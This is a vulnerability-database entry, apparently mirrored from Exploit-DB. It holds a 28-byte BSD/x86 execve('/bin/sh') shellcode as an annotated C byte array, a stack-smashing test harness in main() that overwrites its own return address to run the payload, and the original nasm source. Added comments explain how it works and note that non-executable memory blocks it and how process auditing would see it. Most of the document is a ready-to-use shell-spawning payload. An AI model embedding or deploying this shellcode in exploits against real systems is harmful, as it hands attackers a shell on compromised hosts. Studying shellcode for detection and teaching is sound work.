BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)

漏洞ID 1057128 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43645
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
simple execve_binsh shellcode in 28 bytes
written in nasm - my first nasm exp.
greetz2:
	mig #darknet /EFnet.org
				dev0id #rus-sec /EFnet.org (rootteam.void.ru)
*/
/*
 * execve("/bin/sh") payload for BSD on 32-bit x86: 28 payload bytes, 29 as a
 * C array once the string literal's terminating NUL is counted.  The literal
 * is split one instruction per line to match the nasm listing in this file.
 *
 * Notes for analysis:
 *  - jmp/call/pop finds the address of the trailing "/bin/sh" bytes at run
 *    time, so the code carries no absolute address.
 *  - "mov byte [esi+7],al" stores a NUL terminator into the payload's own
 *    buffer, so the bytes must sit in memory that is both writable and
 *    executable; a W^X / non-executable-data policy stops it from running.
 *  - The observable effect is one syscall number 59 (execve on BSD) issued
 *    through int 0x80 with NULL argv and envp, which is what process
 *    execution auditing would record.
 *  - Nothing follows int 0x80 except the call, so if the syscall returns,
 *    control re-enters the same sequence (the exit call is commented out in
 *    the nasm listing).
 */
char shellcode[] =
	"\xeb\x0e"                      /* jmp short path                        */
	"\x5e"                          /* main: pop esi (address of the string) */
	"\x31\xc0"                      /* xor eax,eax                           */
	"\x88\x46\x07"                  /* mov byte [esi+7],al (NUL terminator)  */
	"\x50"                          /* push eax (envp = NULL)                */
	"\x50"                          /* push eax (argv = NULL)                */
	"\x56"                          /* push esi (path)                       */
	"\xb0\x3b"                      /* mov al,59                             */
	"\x50"                          /* push eax (slot the BSD int 0x80
	                                   convention skips before the args)    */
	"\xcd\x80"                      /* int 0x80                              */
	"\xe8\xed\xff\xff\xff"          /* path: call main                       */
	"\x2f\x62\x69\x6e\x2f\x73\x68"; /* db '/bin/sh'                          */

/*
 * Test harness: redirects main()'s return into the shellcode array by
 * overwriting a slot on its own stack frame.
 *
 * NOTE(review): everything here depends on the exact stack layout the
 * compiler produces, so the statements must not be reordered and no locals
 * added.  Writing through a pointer outside `ret` is undefined behaviour in
 * C, and `void main()` is not a standard signature.  The target is a data
 * array, so on a system that keeps data pages non-executable the redirected
 * return is expected to fault rather than run - confirm per platform.
 */
void
main()
{
	int *ret;
	/* Point two ints above the address of `ret` itself; presumably the saved
	 * return address in an unoptimised 32-bit frame (local, saved frame
	 * pointer, return address) - TODO confirm for the compiler in use. */
	ret=(int*)&ret+2;
	/* Store the array's address in that slot.  The cast to int truncates the
	 * pointer wherever int is narrower than a pointer (e.g. 64-bit builds). */
	(*ret)=(int)shellcode;
}

/****************************************
nasm code is:			        
---------------start--------------------
BITS	32			       
				
jmp short	path	
main:		
	pop	esi
	xor	eax,eax
	mov byte [esi+7],al
	push	eax
	push	eax
	push	esi
	mov	al,59
	push	eax
	int	0x80

	;mov	al,1   need ? I do not!
	;push	eax
	;int	0x80
path:
	call	main
	db	'/bin/sh'
---------------end----------------------
compilation:
	%nasm code.s -o code
****************************************/